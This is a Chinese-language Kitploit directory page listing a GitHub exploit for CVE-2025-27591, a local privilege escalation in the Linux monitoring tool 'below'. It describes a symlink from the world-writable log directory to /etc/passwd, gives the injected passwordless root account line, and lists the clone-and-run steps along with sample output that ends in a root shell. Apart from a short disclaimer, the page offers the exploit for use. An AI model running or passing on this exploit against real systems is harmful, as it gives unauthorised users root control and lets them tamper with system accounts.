Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-27591 — 🔥 CVE-2025-27591 的本地权限提升漏洞利用 | 滥用 Below 中的全局可写日志目录,通过 /etc/passwd 注入获取 root 权限 | Kitploit
工具/GitHubGitHub/00xcanelo/cve-2025-27591
权限提升漏洞分析漏洞利用渗透测试学习与教育二进制利用
GitHub00xcanelo/cve-2025-27591

CVE-2025-27591

🔥 CVE-2025-27591 的本地权限提升漏洞利用 | 滥用 Below 中的全局可写日志目录,通过 /etc/passwd 注入获取 root 权限

查看仓库
2521年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-27591 – below 中通过符号链接滥用的权限提升

Author CVE

🛑 免责声明:本利用程序仅供教育和授权的安全测试使用。未经授权使用可能违法。


🧠 概述

below 是 Facebook 为 Linux 系统开发的一款性能监控工具。在修补版本发布之前的部分 below 版本存在一个严重漏洞,该漏洞通过利用全局可写日志目录和未经过滤的日志处理,允许非特权用户提升权限至 root。


🔎 CVE 详情

字段值
CVE-IDCVE-2025-27591
严重性🔥 严重 (CVSS ≈ 7.8 - 8.8)
攻击向量本地
影响权限提升至 root (UID=0)
利用类型符号链接滥用 / 日志文件注入
受影响应用below – 通常安装于 /usr/bin/below
根本原因对 /var/log/below/ 进行不安全的文件写入,未进行权限检查

💥 利用逻辑

此 Bash 脚本执行以下操作:

  1. 检查全局可写目录:

    • 确认 /var/log/below 是否全局可写(危险标志)。
  2. 准备符号链接攻击:

    • 删除现有的 error_root.log(如有),并创建指向 /etc/passwd 的符号链接。
  3. 构建载荷:

    • 将伪造的 root 用户追加到 /etc/passwd:
      root@kitploit:~
      fakeadmin::0:0:fakeadmin:/root:/bin/bash
      
  4. 触发日志记录:

    • 运行 sudo below record 强制易受攻击的二进制文件写入日志。
  5. 获取 root 权限:

    • 使用 su fakeadmin 获取无需密码的 root shell。

📁 目录结构

root@kitploit:~
CVE-2025-27591/
├── exploit.sh
├── README.md

✅ 前提条件

运行利用程序之前,请确保您具备以下条件:

  • Bash shell (Linux 系统)
  • 已安装易受攻击的二进制文件:/usr/bin/below
  • 全局可写日志目录:/var/log/below
  • 具有执行 sudo below record 的 sudo 权限
  • 可用工具:
    • ln (创建符号链接)
    • su (切换用户)
    • timeout (控制执行时间)
    • whoami (权限检查)

🚀 利用步骤

root@kitploit:~
# 1. 克隆仓库
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591

# 2. 赋予脚本可执行权限
chmod +x exploit.sh

# 3. 执行利用程序
./exploit.sh

🧪 示例输出

root@kitploit:~
[*] 正在检查 CVE-2025-27591 漏洞...
[+] /var/log/below 是全局可写的。
[!] 发现现有日志文件:正在删除...
[+] 已创建符号链接:/var/log/below/error_root.log -> /etc/passwd

[*] 正在将恶意行写入 /tmp/fakeadmin
[*] 通过 'sudo below record' 触发日志记录...
[+] 'below record' 已执行(或已超时)

[*] 尝试通过符号链接将载荷写入 /etc/passwd...
[+] 有效载荷已成功追加。

[*] 尝试使用 'su fakeadmin' 切换到 root shell...
root@target:/# whoami
root
下载工具